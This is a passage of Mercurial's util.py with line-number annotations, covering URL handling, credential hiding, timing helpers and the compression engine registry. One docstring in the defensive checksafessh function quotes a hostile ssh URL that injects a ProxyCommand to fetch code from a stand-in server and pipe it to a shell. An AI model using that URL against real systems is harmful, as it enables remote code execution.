2846 2848 if (self.host and ':' in self.host and
2847 2849 not (self.host.startswith('[') and self.host.endswith(']'))):
2848 2850 self._hostport = self.host
2849 2851 self.host, self.port = self.host.rsplit(':', 1)
2850 2852 if not self.host:
2851 2853 self.host = None
2852 2854
2853 2855 if (self.host and self.scheme == 'file' and
2854 2856 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2855 2857 raise Abort(_('file:// URLs can only refer to localhost'))
2856 2858
2857 2859 self.path = path
2858 2860
2859 2861 # leave the query string escaped
2860 2862 for a in ('user', 'passwd', 'host', 'port',
2861 2863 'path', 'fragment'):
2862 2864 v = getattr(self, a)
2863 2865 if v is not None:
2864 2866 setattr(self, a, urlreq.unquote(v))
2865 2867
2866 2868 @encoding.strmethod
2867 2869 def __repr__(self):
2868 2870 attrs = []
2869 2871 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2870 2872 'query', 'fragment'):
2871 2873 v = getattr(self, a)
2872 2874 if v is not None:
2873 2875 attrs.append('%s: %r' % (a, v))
2874 2876 return '<url %s>' % ', '.join(attrs)
2875 2877
2876 2878 def __bytes__(self):
2877 2879 r"""Join the URL's components back into a URL string.
2878 2880
2879 2881 Examples:
2880 2882
2881 2883 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2882 2884 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2883 2885 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2884 2886 'http://user:pw@host:80/?foo=bar&baz=42'
2885 2887 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2886 2888 'http://user:pw@host:80/?foo=bar%3dbaz'
2887 2889 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2888 2890 'ssh://user:pw@[::1]:2200//home/joe#'
2889 2891 >>> bytes(url(b'http://localhost:80//'))
2890 2892 'http://localhost:80//'
2891 2893 >>> bytes(url(b'http://localhost:80/'))
2892 2894 'http://localhost:80/'
2893 2895 >>> bytes(url(b'http://localhost:80'))
2894 2896 'http://localhost:80/'
2895 2897 >>> bytes(url(b'bundle:foo'))
2896 2898 'bundle:foo'
2897 2899 >>> bytes(url(b'bundle://../foo'))
2898 2900 'bundle:../foo'
2899 2901 >>> bytes(url(b'path'))
2900 2902 'path'
2901 2903 >>> bytes(url(b'file:///tmp/foo/bar'))
2902 2904 'file:///tmp/foo/bar'
2903 2905 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2904 2906 'file:///c:/tmp/foo/bar'
2905 2907 >>> print(url(br'bundle:foo\bar'))
2906 2908 bundle:foo\bar
2907 2909 >>> print(url(br'file:///D:\data\hg'))
2908 2910 file:///D:\data\hg
2909 2911 """
2910 2912 if self._localpath:
2911 2913 s = self.path
2912 2914 if self.scheme == 'bundle':
2913 2915 s = 'bundle:' + s
2914 2916 if self.fragment:
2915 2917 s += '#' + self.fragment
2916 2918 return s
2917 2919
2918 2920 s = self.scheme + ':'
2919 2921 if self.user or self.passwd or self.host:
2920 2922 s += '//'
2921 2923 elif self.scheme and (not self.path or self.path.startswith('/')
2922 2924 or hasdriveletter(self.path)):
2923 2925 s += '//'
2924 2926 if hasdriveletter(self.path):
2925 2927 s += '/'
2926 2928 if self.user:
2927 2929 s += urlreq.quote(self.user, safe=self._safechars)
2928 2930 if self.passwd:
2929 2931 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2930 2932 if self.user or self.passwd:
2931 2933 s += '@'
2932 2934 if self.host:
2933 2935 if not (self.host.startswith('[') and self.host.endswith(']')):
2934 2936 s += urlreq.quote(self.host)
2935 2937 else:
2936 2938 s += self.host
2937 2939 if self.port:
2938 2940 s += ':' + urlreq.quote(self.port)
2939 2941 if self.host:
2940 2942 s += '/'
2941 2943 if self.path:
2942 2944 # TODO: similar to the query string, we should not unescape the
2943 2945 # path when we store it, the path might contain '%2f' = '/',
2944 2946 # which we should *not* escape.
2945 2947 s += urlreq.quote(self.path, safe=self._safepchars)
2946 2948 if self.query:
2947 2949 # we store the query in escaped form.
2948 2950 s += '?' + self.query
2949 2951 if self.fragment is not None:
2950 2952 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2951 2953 return s
2952 2954
2953 2955 __str__ = encoding.strmethod(__bytes__)
2954 2956
2955 2957 def authinfo(self):
2956 2958 user, passwd = self.user, self.passwd
2957 2959 try:
2958 2960 self.user, self.passwd = None, None
2959 2961 s = bytes(self)
2960 2962 finally:
2961 2963 self.user, self.passwd = user, passwd
2962 2964 if not self.user:
2963 2965 return (s, None)
2964 2966 # authinfo[1] is passed to urllib2 password manager, and its
2965 2967 # URIs must not contain credentials. The host is passed in the
2966 2968 # URIs list because Python < 2.4.3 uses only that to search for
2967 2969 # a password.
2968 2970 return (s, (None, (s, self.host),
2969 2971 self.user, self.passwd or ''))
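    # Illustrative authinfo() result (a sketch; plain str is shown where
    # the codebase would use bytes):
    #
    #     u = url('http://joe:xyz@example.com/repo')
    #     u.authinfo()
    #     # -> ('http://example.com/repo',
    #     #     (None, ('http://example.com/repo', 'example.com'),
    #     #      'joe', 'xyz'))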
2970 2972
2971 2973 def isabs(self):
2972 2974 if self.scheme and self.scheme != 'file':
2973 2975 return True # remote URL
2974 2976 if hasdriveletter(self.path):
2975 2977 return True # absolute for our purposes - can't be joined()
2976 2978 if self.path.startswith(br'\\'):
2977 2979 return True # Windows UNC path
2978 2980 if self.path.startswith('/'):
2979 2981 return True # POSIX-style
2980 2982 return False
2981 2983
2982 2984 def localpath(self):
2983 2985 if self.scheme == 'file' or self.scheme == 'bundle':
2984 2986 path = self.path or '/'
2985 2987 # For Windows, we need to promote hosts containing drive
2986 2988 # letters to paths with drive letters.
2987 2989 if hasdriveletter(self._hostport):
2988 2990 path = self._hostport + '/' + self.path
2989 2991 elif (self.host is not None and self.path
2990 2992 and not hasdriveletter(path)):
2991 2993 path = '/' + path
2992 2994 return path
2993 2995 return self._origpath
2994 2996
2995 2997 def islocal(self):
2996 2998 '''whether localpath will return something that posixfile can open'''
2997 2999 return (not self.scheme or self.scheme == 'file'
2998 3000 or self.scheme == 'bundle')
2999 3001
3000 3002 def hasscheme(path):
3001 3003 return bool(url(path).scheme)
3002 3004
3003 3005 def hasdriveletter(path):
3004 3006 return path and path[1:2] == ':' and path[0:1].isalpha()
3005 3007
3006 3008 def urllocalpath(path):
3007 3009 return url(path, parsequery=False, parsefragment=False).localpath()
3008 3010
3009 3011 def checksafessh(path):
3010 3012 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3011 3013
3012 3014 This is a sanity check for ssh urls: ssh parses a host beginning with
3013 3015 a dash as an option, e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3014 3016 Let's prevent these potentially exploited urls entirely and warn the
3015 3017 user.
3016 3018
3017 3019 Raises an error.Abort when the url is unsafe.
3018 3020 """
3019 3021 path = urlreq.unquote(path)
3020 3022 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3021 3023 raise error.Abort(_('potentially unsafe url: %r') %
3022 3024 (path,))
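# Example (sketch): a host beginning with '-' would be parsed by ssh as a
# command-line option, so such urls are rejected outright.
#
#     checksafessh('ssh://host/repo')              # accepted, returns None
#     checksafessh('ssh://-oProxyCommand=bad/x')   # raises error.Abort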
3023 3025
3024 3026 def hidepassword(u):
3025 3027 '''hide user credentials in a url string'''
3026 3028 u = url(u)
3027 3029 if u.passwd:
3028 3030 u.passwd = '***'
3029 3031 return bytes(u)
3030 3032
3031 3033 def removeauth(u):
3032 3034 '''remove all authentication information from a url string'''
3033 3035 u = url(u)
3034 3036 u.user = u.passwd = None
3035 3037 return bytes(u)
3036 3038
3037 3039 timecount = unitcountfn(
3038 3040 (1, 1e3, _('%.0f s')),
3039 3041 (100, 1, _('%.1f s')),
3040 3042 (10, 1, _('%.2f s')),
3041 3043 (1, 1, _('%.3f s')),
3042 3044 (100, 0.001, _('%.1f ms')),
3043 3045 (10, 0.001, _('%.2f ms')),
3044 3046 (1, 0.001, _('%.3f ms')),
3045 3047 (100, 0.000001, _('%.1f us')),
3046 3048 (10, 0.000001, _('%.2f us')),
3047 3049 (1, 0.000001, _('%.3f us')),
3048 3050 (100, 0.000000001, _('%.1f ns')),
3049 3051 (10, 0.000000001, _('%.2f ns')),
3050 3052 (1, 0.000000001, _('%.3f ns')),
3051 3053 )
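# Example output (a sketch, assuming unitcountfn() - defined earlier in this
# module - returns a formatter that picks the first row whose threshold
# (multiplier * divisor) the value meets):
#
#     timecount(15)       # -> '15.00 s'
#     timecount(0.0042)   # -> '4.200 ms'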
3052 3054
3053 3055 _timenesting = [0]
3054 3056
3055 3057 def timed(func):
3056 3058 '''Report the execution time of a function call to stderr.
3057 3059
3058 3060 During development, use as a decorator when you need to measure
3059 3061 the cost of a function, e.g. as follows:
3060 3062
3061 3063 @util.timed
3062 3064 def foo(a, b, c):
3063 3065 pass
3064 3066 '''
3065 3067
3066 3068 def wrapper(*args, **kwargs):
3067 3069 start = timer()
3068 3070 indent = 2
3069 3071 _timenesting[0] += indent
3070 3072 try:
3071 3073 return func(*args, **kwargs)
3072 3074 finally:
3073 3075 elapsed = timer() - start
3074 3076 _timenesting[0] -= indent
3075 3077 stderr.write('%s%s: %s\n' %
3076 3078 (' ' * _timenesting[0], func.__name__,
3077 3079 timecount(elapsed)))
3078 3080 return wrapper
3079 3081
3080 3082 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3081 3083 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3082 3084
3083 3085 def sizetoint(s):
3084 3086 '''Convert a space specifier to a byte count.
3085 3087
3086 3088 >>> sizetoint(b'30')
3087 3089 30
3088 3090 >>> sizetoint(b'2.2kb')
3089 3091 2252
3090 3092 >>> sizetoint(b'6M')
3091 3093 6291456
3092 3094 '''
3093 3095 t = s.strip().lower()
3094 3096 try:
3095 3097 for k, u in _sizeunits:
3096 3098 if t.endswith(k):
3097 3099 return int(float(t[:-len(k)]) * u)
3098 3100 return int(t)
3099 3101 except ValueError:
3100 3102 raise error.ParseError(_("couldn't parse size: %s") % s)
3101 3103
3102 3104 class hooks(object):
3103 3105 '''A collection of hook functions that can be used to extend a
3104 3106 function's behavior. Hooks are called in lexicographic order,
3105 3107 based on the names of their sources.'''
3106 3108
3107 3109 def __init__(self):
3108 3110 self._hooks = []
3109 3111
3110 3112 def add(self, source, hook):
3111 3113 self._hooks.append((source, hook))
3112 3114
3113 3115 def __call__(self, *args):
3114 3116 self._hooks.sort(key=lambda x: x[0])
3115 3117 results = []
3116 3118 for source, hook in self._hooks:
3117 3119 results.append(hook(*args))
3118 3120 return results
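# Example (sketch): hooks run in lexicographic order of their source names,
# regardless of registration order.
#
#     h = hooks()
#     h.add('zz-last', lambda x: x + 1)
#     h.add('aa-first', lambda x: x * 2)
#     h(3)   # -> [6, 4]  ('aa-first' runs before 'zz-last')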
3119 3121
3120 3122 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3121 3123 '''Yields lines for a nicely formatted stacktrace.
3122 3124 Skips the 'skip' last entries, then returns the last 'depth' entries.
3123 3125 Each file+linenumber is formatted according to fileline.
3124 3126 Each line is formatted according to line.
3125 3127 If line is None, it yields:
3126 3128 length of longest filepath+line number,
3127 3129 filepath+linenumber,
3128 3130 function
3129 3131
3130 3132 Not to be used in production code, but very convenient while developing.
3131 3133 '''
3132 3134 entries = [(fileline % (fn, ln), func)
3133 3135 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3134 3136 ][-depth:]
3135 3137 if entries:
3136 3138 fnmax = max(len(entry[0]) for entry in entries)
3137 3139 for fnln, func in entries:
3138 3140 if line is None:
3139 3141 yield (fnmax, fnln, func)
3140 3142 else:
3141 3143 yield line % (fnmax, fnln, func)
3142 3144
3143 3145 def debugstacktrace(msg='stacktrace', skip=0,
3144 3146 f=stderr, otherf=stdout, depth=0):
3145 3147 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3146 3148 Skips the 'skip' entries closest to the call, then shows 'depth' entries.
3147 3149 By default it will flush stdout first.
3148 3150 It can be used everywhere and intentionally does not require an ui object.
3149 3151 Not to be used in production code, but very convenient while developing.
3150 3152 '''
3151 3153 if otherf:
3152 3154 otherf.flush()
3153 3155 f.write('%s at:\n' % msg.rstrip())
3154 3156 for line in getstackframes(skip + 1, depth=depth):
3155 3157 f.write(line)
3156 3158 f.flush()
3157 3159
3158 3160 class dirs(object):
3159 3161 '''a multiset of directory names from a dirstate or manifest'''
3160 3162
3161 3163 def __init__(self, map, skip=None):
3162 3164 self._dirs = {}
3163 3165 addpath = self.addpath
3164 3166 if safehasattr(map, 'iteritems') and skip is not None:
3165 3167 for f, s in map.iteritems():
3166 3168 if s[0] != skip:
3167 3169 addpath(f)
3168 3170 else:
3169 3171 for f in map:
3170 3172 addpath(f)
3171 3173
3172 3174 def addpath(self, path):
3173 3175 dirs = self._dirs
3174 3176 for base in finddirs(path):
3175 3177 if base in dirs:
3176 3178 dirs[base] += 1
3177 3179 return
3178 3180 dirs[base] = 1
3179 3181
3180 3182 def delpath(self, path):
3181 3183 dirs = self._dirs
3182 3184 for base in finddirs(path):
3183 3185 if dirs[base] > 1:
3184 3186 dirs[base] -= 1
3185 3187 return
3186 3188 del dirs[base]
3187 3189
3188 3190 def __iter__(self):
3189 3191 return iter(self._dirs)
3190 3192
3191 3193 def __contains__(self, d):
3192 3194 return d in self._dirs
3193 3195
3194 3196 if safehasattr(parsers, 'dirs'):
3195 3197 dirs = parsers.dirs
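# Example (sketch): each directory is reference-counted, so delpath() only
# forgets a directory once its last entry is removed.
#
#     d = dirs(['a/b/x', 'a/b/y', 'a/c'])
#     'a/b' in d          # -> True
#     d.delpath('a/b/x')
#     'a/b' in d          # -> True ('a/b/y' still present)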
3196 3198
3197 3199 def finddirs(path):
3198 3200 pos = path.rfind('/')
3199 3201 while pos != -1:
3200 3202 yield path[:pos]
3201 3203 pos = path.rfind('/', 0, pos)
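# Example (sketch): finddirs() yields ancestor directories from the
# immediate parent up to, but not including, the root.
#
#     list(finddirs('a/b/c'))   # -> ['a/b', 'a']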
3202 3204
3203 3205 # compression code
3204 3206
3205 3207 SERVERROLE = 'server'
3206 3208 CLIENTROLE = 'client'
3207 3209
3208 3210 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3209 3211 (u'name', u'serverpriority',
3210 3212 u'clientpriority'))
3211 3213
3212 3214 class compressormanager(object):
3213 3215 """Holds registrations of various compression engines.
3214 3216
3215 3217 This class essentially abstracts the differences between compression
3216 3218 engines to allow new compression formats to be added easily, possibly from
3217 3219 extensions.
3218 3220
3219 3221 Compressors are registered against the global instance by calling its
3220 3222 ``register()`` method.
3221 3223 """
3222 3224 def __init__(self):
3223 3225 self._engines = {}
3224 3226 # Bundle spec human name to engine name.
3225 3227 self._bundlenames = {}
3226 3228 # Internal bundle identifier to engine name.
3227 3229 self._bundletypes = {}
3228 3230 # Revlog header to engine name.
3229 3231 self._revlogheaders = {}
3230 3232 # Wire proto identifier to engine name.
3231 3233 self._wiretypes = {}
3232 3234
3233 3235 def __getitem__(self, key):
3234 3236 return self._engines[key]
3235 3237
3236 3238 def __contains__(self, key):
3237 3239 return key in self._engines
3238 3240
3239 3241 def __iter__(self):
3240 3242 return iter(self._engines.keys())
3241 3243
3242 3244 def register(self, engine):
3243 3245 """Register a compression engine with the manager.
3244 3246
3245 3247 The argument must be a ``compressionengine`` instance.
3246 3248 """
3247 3249 if not isinstance(engine, compressionengine):
3248 3250 raise ValueError(_('argument must be a compressionengine'))
3249 3251
3250 3252 name = engine.name()
3251 3253
3252 3254 if name in self._engines:
3253 3255 raise error.Abort(_('compression engine %s already registered') %
3254 3256 name)
3255 3257
3256 3258 bundleinfo = engine.bundletype()
3257 3259 if bundleinfo:
3258 3260 bundlename, bundletype = bundleinfo
3259 3261
3260 3262 if bundlename in self._bundlenames:
3261 3263 raise error.Abort(_('bundle name %s already registered') %
3262 3264 bundlename)
3263 3265 if bundletype in self._bundletypes:
3264 3266 raise error.Abort(_('bundle type %s already registered by %s') %
3265 3267 (bundletype, self._bundletypes[bundletype]))
3266 3268
3267 3269 # Only register the external facing name if one was declared.
3268 3270 if bundlename:
3269 3271 self._bundlenames[bundlename] = name
3270 3272
3271 3273 self._bundletypes[bundletype] = name
3272 3274
3273 3275 wiresupport = engine.wireprotosupport()
3274 3276 if wiresupport:
3275 3277 wiretype = wiresupport.name
3276 3278 if wiretype in self._wiretypes:
3277 3279 raise error.Abort(_('wire protocol compression %s already '
3278 3280 'registered by %s') %
3279 3281 (wiretype, self._wiretypes[wiretype]))
3280 3282
3281 3283 self._wiretypes[wiretype] = name
3282 3284
3283 3285 revlogheader = engine.revlogheader()
3284 3286 if revlogheader and revlogheader in self._revlogheaders:
3285 3287 raise error.Abort(_('revlog header %s already registered by %s') %
3286 3288 (revlogheader, self._revlogheaders[revlogheader]))
3287 3289
3288 3290 if revlogheader:
3289 3291 self._revlogheaders[revlogheader] = name
3290 3292
3291 3293 self._engines[name] = engine
3292 3294
3293 3295 @property
3294 3296 def supportedbundlenames(self):
3295 3297 return set(self._bundlenames.keys())
3296 3298
3297 3299 @property
3298 3300 def supportedbundletypes(self):
3299 3301 return set(self._bundletypes.keys())
3300 3302
3301 3303 def forbundlename(self, bundlename):
3302 3304 """Obtain a compression engine registered to a bundle name.
3303 3305
3304 3306 Will raise KeyError if the bundle type isn't registered.
3305 3307
3306 3308 Will abort if the engine is known but not available.
3307 3309 """
3308 3310 engine = self._engines[self._bundlenames[bundlename]]
3309 3311 if not engine.available():
3310 3312 raise error.Abort(_('compression engine %s could not be loaded') %
3311 3313 engine.name())
3312 3314 return engine
3313 3315
3314 3316 def forbundletype(self, bundletype):
3315 3317 """Obtain a compression engine registered to a bundle type.
3316 3318
3317 3319 Will raise KeyError if the bundle type isn't registered.
3318 3320
3319 3321 Will abort if the engine is known but not available.
3320 3322 """
3321 3323 engine = self._engines[self._bundletypes[bundletype]]
3322 3324 if not engine.available():
3323 3325 raise error.Abort(_('compression engine %s could not be loaded') %
3324 3326 engine.name())
3325 3327 return engine
3326 3328
3327 3329 def supportedwireengines(self, role, onlyavailable=True):
3328 3330 """Obtain compression engines that support the wire protocol.
3329 3331
3330 3332 Returns a list of engines in prioritized order, most desired first.
3331 3333
3332 3334 If ``onlyavailable`` is set, filter out engines that can't be
3333 3335 loaded.
3334 3336 """
3335 3337 assert role in (SERVERROLE, CLIENTROLE)
3336 3338
3337 3339 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3338 3340
3339 3341 engines = [self._engines[e] for e in self._wiretypes.values()]
3340 3342 if onlyavailable:
3341 3343 engines = [e for e in engines if e.available()]
3342 3344
3343 3345 def getkey(e):
3344 3346 # Sort first by priority, highest first. In case of tie, sort
3345 3347 # alphabetically. This is arbitrary, but ensures output is
3346 3348 # stable.
3347 3349 w = e.wireprotosupport()
3348 3350 return -1 * getattr(w, attr), w.name
3349 3351
3350 3352 return sorted(engines, key=getkey)
3351 3353
3352 3354 def forwiretype(self, wiretype):
3353 3355 engine = self._engines[self._wiretypes[wiretype]]
3354 3356 if not engine.available():
3355 3357 raise error.Abort(_('compression engine %s could not be loaded') %
3356 3358 engine.name())
3357 3359 return engine
3358 3360
3359 3361 def forrevlogheader(self, header):
3360 3362 """Obtain a compression engine registered to a revlog header.
3361 3363
3362 3364 Will raise KeyError if the revlog header value isn't registered.
3363 3365 """
3364 3366 return self._engines[self._revlogheaders[header]]
3365 3367
3366 3368 compengines = compressormanager()
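# Illustrative lookups against the global manager (a sketch; the engines
# referenced here are registered further down in this module):
#
#     engine = compengines.forbundlename('gzip')   # the zlib engine
#     data = b''.join(engine.compressstream(iter([b'some data'])))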
3367 3369
3368 3370 class compressionengine(object):
3369 3371 """Base class for compression engines.
3370 3372
3371 3373 Compression engines must implement the interface defined by this class.
3372 3374 """
3373 3375 def name(self):
3374 3376 """Returns the name of the compression engine.
3375 3377
3376 3378 This is the key the engine is registered under.
3377 3379
3378 3380 This method must be implemented.
3379 3381 """
3380 3382 raise NotImplementedError()
3381 3383
3382 3384 def available(self):
3383 3385 """Whether the compression engine is available.
3384 3386
3385 3387 The intent of this method is to allow optional compression engines
3386 3388 that may not be available in all installations (such as engines relying
3387 3389 on C extensions that may not be present).
3388 3390 """
3389 3391 return True
3390 3392
3391 3393 def bundletype(self):
3392 3394 """Describes bundle identifiers for this engine.
3393 3395
3394 3396 If this compression engine isn't supported for bundles, returns None.
3395 3397
3396 3398 If this engine can be used for bundles, returns a 2-tuple of strings of
3397 3399 the user-facing "bundle spec" compression name and an internal
3398 3400 identifier used to denote the compression format within bundles. To
3399 3401 exclude the name from external usage, set the first element to ``None``.
3400 3402
3401 3403 If bundle compression is supported, the class must also implement
3402 3404 ``compressstream`` and ``decompressorreader``.
3403 3405
3404 3406 The docstring of this method is used in the help system to tell users
3405 3407 about this engine.
3406 3408 """
3407 3409 return None
3408 3410
3409 3411 def wireprotosupport(self):
3410 3412 """Declare support for this compression format on the wire protocol.
3411 3413
3412 3414 If this compression engine isn't supported for compressing wire
3413 3415 protocol payloads, returns None.
3414 3416
3415 3417 Otherwise, returns ``compenginewireprotosupport`` with the following
3416 3418 fields:
3417 3419
3418 3420 * String format identifier
3419 3421 * Integer priority for the server
3420 3422 * Integer priority for the client
3421 3423
3422 3424 The integer priorities are used to order the advertisement of format
3423 3425 support by server and client. The highest integer is advertised
3424 3426 first. Integers with non-positive values aren't advertised.
3425 3427
3426 3428 The priority values are somewhat arbitrary and only used for default
3427 3429 ordering. The relative order can be changed via config options.
3428 3430
3429 3431 If wire protocol compression is supported, the class must also implement
3430 3432 ``compressstream`` and ``decompressorreader``.
3431 3433 """
3432 3434 return None
3433 3435
3434 3436 def revlogheader(self):
3435 3437 """Header added to revlog chunks that identifies this engine.
3436 3438
3437 3439 If this engine can be used to compress revlogs, this method should
3438 3440 return the bytes used to identify chunks compressed with this engine.
3439 3441 Else, the method should return ``None`` to indicate it does not
3440 3442 participate in revlog compression.
3441 3443 """
3442 3444 return None
3443 3445
3444 3446 def compressstream(self, it, opts=None):
3445 3447 """Compress an iterator of chunks.
3446 3448
3447 3449 The method receives an iterator (ideally a generator) of chunks of
3448 3450 bytes to be compressed. It returns an iterator (ideally a generator)
3449 3451 of bytes of chunks representing the compressed output.
3450 3452
3451 3453 Optionally accepts an argument defining how to perform compression.
3452 3454 Each engine treats this argument differently.
3453 3455 """
3454 3456 raise NotImplementedError()
3455 3457
3456 3458 def decompressorreader(self, fh):
3457 3459 """Perform decompression on a file object.
3458 3460
3459 3461 Argument is an object with a ``read(size)`` method that returns
3460 3462 compressed data. Return value is an object with a ``read(size)`` that
3461 3463 returns uncompressed data.
3462 3464 """
3463 3465 raise NotImplementedError()
3464 3466
3465 3467 def revlogcompressor(self, opts=None):
3466 3468 """Obtain an object that can be used to compress revlog entries.
3467 3469
3468 3470 The object has a ``compress(data)`` method that compresses binary
3469 3471 data. This method returns compressed binary data or ``None`` if
3470 3472 the data could not be compressed (too small, not compressible, etc).
3471 3473 The returned data should have a header uniquely identifying this
3472 3474 compression format so decompression can be routed to this engine.
3473 3475 This header should be identified by the ``revlogheader()`` return
3474 3476 value.
3475 3477
3476 3478 The object has a ``decompress(data)`` method that decompresses
3477 3479 data. The method will only be called if ``data`` begins with
3478 3480 ``revlogheader()``. The method should return the raw, uncompressed
3479 3481 data or raise a ``RevlogError``.
3480 3482
3481 3483 The object is reusable but is not thread safe.
3482 3484 """
3483 3485 raise NotImplementedError()
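# A minimal custom engine (hypothetical, e.g. registered from an extension).
# Only name() must be implemented; every other method defaults to "not
# supported".  The concrete engines below are the real in-tree examples.
#
#     class _identityengine(compressionengine):
#         def name(self):
#             return 'identity'
#
#     compengines.register(_identityengine())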
3484 3486
3485 3487 class _zlibengine(compressionengine):
3486 3488 def name(self):
3487 3489 return 'zlib'
3488 3490
3489 3491 def bundletype(self):
3490 3492 """zlib compression using the DEFLATE algorithm.
3491 3493
3492 3494 All Mercurial clients should support this format. The compression
3493 3495 algorithm strikes a reasonable balance between compression ratio
3494 3496 and size.
3495 3497 """
3496 3498 return 'gzip', 'GZ'
3497 3499
3498 3500 def wireprotosupport(self):
3499 3501 return compewireprotosupport('zlib', 20, 20)
3500 3502
3501 3503 def revlogheader(self):
3502 3504 return 'x'
3503 3505
3504 3506 def compressstream(self, it, opts=None):
3505 3507 opts = opts or {}
3506 3508
3507 3509 z = zlib.compressobj(opts.get('level', -1))
3508 3510 for chunk in it:
3509 3511 data = z.compress(chunk)
3510 3512 # Not all calls to compress emit data. It is cheaper to inspect
3511 3513 # here than to feed empty chunks through generator.
3512 3514 if data:
3513 3515 yield data
3514 3516
3515 3517 yield z.flush()
3516 3518
3517 3519 def decompressorreader(self, fh):
3518 3520 def gen():
3519 3521 d = zlib.decompressobj()
3520 3522 for chunk in filechunkiter(fh):
3521 3523 while chunk:
3522 3524 # Limit output size to limit memory.
3523 3525 yield d.decompress(chunk, 2 ** 18)
3524 3526 chunk = d.unconsumed_tail
3525 3527
3526 3528 return chunkbuffer(gen())
3527 3529
3528 3530 class zlibrevlogcompressor(object):
3529 3531 def compress(self, data):
3530 3532 insize = len(data)
3531 3533 # Caller handles empty input case.
3532 3534 assert insize > 0
3533 3535
3534 3536 if insize < 44:
3535 3537 return None
3536 3538
3537 3539 elif insize <= 1000000:
3538 3540 compressed = zlib.compress(data)
3539 3541 if len(compressed) < insize:
3540 3542 return compressed
3541 3543 return None
3542 3544
3543 3545 # zlib makes an internal copy of the input buffer, doubling
3544 3546 # memory usage for large inputs. So do streaming compression
3545 3547 # on large inputs.
3546 3548 else:
3547 3549 z = zlib.compressobj()
3548 3550 parts = []
3549 3551 pos = 0
3550 3552 while pos < insize:
3551 3553 pos2 = pos + 2**20
3552 3554 parts.append(z.compress(data[pos:pos2]))
3553 3555 pos = pos2
3554 3556 parts.append(z.flush())
3555 3557
3556 3558 if sum(map(len, parts)) < insize:
3557 3559 return ''.join(parts)
3558 3560 return None
3559 3561
3560 3562 def decompress(self, data):
3561 3563 try:
3562 3564 return zlib.decompress(data)
3563 3565 except zlib.error as e:
3564 3566 raise error.RevlogError(_('revlog decompress error: %s') %
3565 3567 str(e))
3566 3568
3567 3569 def revlogcompressor(self, opts=None):
3568 3570 return self.zlibrevlogcompressor()
3569 3571
3570 3572 compengines.register(_zlibengine())
3571 3573
3572 3574 class _bz2engine(compressionengine):
3573 3575 def name(self):
3574 3576 return 'bz2'
3575 3577
3576 3578 def bundletype(self):
3577 3579 """An algorithm that produces smaller bundles than ``gzip``.
3578 3580
3579 3581 All Mercurial clients should support this format.
3580 3582
3581 3583 This engine will likely produce smaller bundles than ``gzip`` but
3582 3584 will be significantly slower, both during compression and
3583 3585 decompression.
3584 3586
3585 3587 If available, the ``zstd`` engine can yield similar or better
3586 3588 compression at much higher speeds.
3587 3589 """
3588 3590 return 'bzip2', 'BZ'
3589 3591
3590 3592 # We declare a protocol name but don't advertise by default because
3591 3593 # it is slow.
3592 3594 def wireprotosupport(self):
3593 3595 return compewireprotosupport('bzip2', 0, 0)
3594 3596
3595 3597 def compressstream(self, it, opts=None):
3596 3598 opts = opts or {}
3597 3599 z = bz2.BZ2Compressor(opts.get('level', 9))
3598 3600 for chunk in it:
3599 3601 data = z.compress(chunk)
3600 3602 if data:
3601 3603 yield data
3602 3604
3603 3605 yield z.flush()
3604 3606
3605 3607 def decompressorreader(self, fh):
3606 3608 def gen():
3607 3609 d = bz2.BZ2Decompressor()
3608 3610 for chunk in filechunkiter(fh):
3609 3611 yield d.decompress(chunk)
3610 3612
3611 3613 return chunkbuffer(gen())
3612 3614
3613 3615 compengines.register(_bz2engine())
3614 3616
3615 3617 class _truncatedbz2engine(compressionengine):
3616 3618 def name(self):
3617 3619 return 'bz2truncated'
3618 3620
3619 3621 def bundletype(self):
3620 3622 return None, '_truncatedBZ'
3621 3623
3622 3624 # We don't implement compressstream because it is hackily handled elsewhere.
3623 3625
3624 3626 def decompressorreader(self, fh):
3625 3627 def gen():
3626 3628 # The input stream doesn't have the 'BZ' header. So add it back.
3627 3629 d = bz2.BZ2Decompressor()
3628 3630 d.decompress('BZ')
3629 3631 for chunk in filechunkiter(fh):
3630 3632 yield d.decompress(chunk)
3631 3633
3632 3634 return chunkbuffer(gen())
3633 3635
3634 3636 compengines.register(_truncatedbz2engine())
3635 3637
3636 3638 class _noopengine(compressionengine):
3637 3639 def name(self):
3638 3640 return 'none'
3639 3641
3640 3642 def bundletype(self):
3641 3643 """No compression is performed.
3642 3644
3643 3645 Use this compression engine to explicitly disable compression.
3644 3646 """
3645 3647 return 'none', 'UN'
3646 3648
3647 3649 # Clients always support uncompressed payloads. Servers don't advertise
3648 3650 # them because, unless you are on a fast network, uncompressed payloads
3649 3651 # can easily saturate your network pipe.
3650 3652 def wireprotosupport(self):
3651 3653 return compewireprotosupport('none', 0, 10)
3652 3654
3653 3655 # We don't implement revlogheader because it is handled specially
3654 3656 # in the revlog class.
3655 3657
3656 3658 def compressstream(self, it, opts=None):
3657 3659 return it
3658 3660
3659 3661 def decompressorreader(self, fh):
3660 3662 return fh
3661 3663
3662 3664 class nooprevlogcompressor(object):
3663 3665 def compress(self, data):
3664 3666 return None
3665 3667
3666 3668 def revlogcompressor(self, opts=None):
3667 3669 return self.nooprevlogcompressor()
3668 3670
3669 3671 compengines.register(_noopengine())
3670 3672
3671 3673 class _zstdengine(compressionengine):
3672 3674 def name(self):
3673 3675 return 'zstd'
3674 3676
3675 3677 @propertycache
3676 3678 def _module(self):
3677 3679 # Not all installs have the zstd module available. So defer importing
3678 3680 # until first access.
3679 3681 try:
3680 3682 from . import zstd
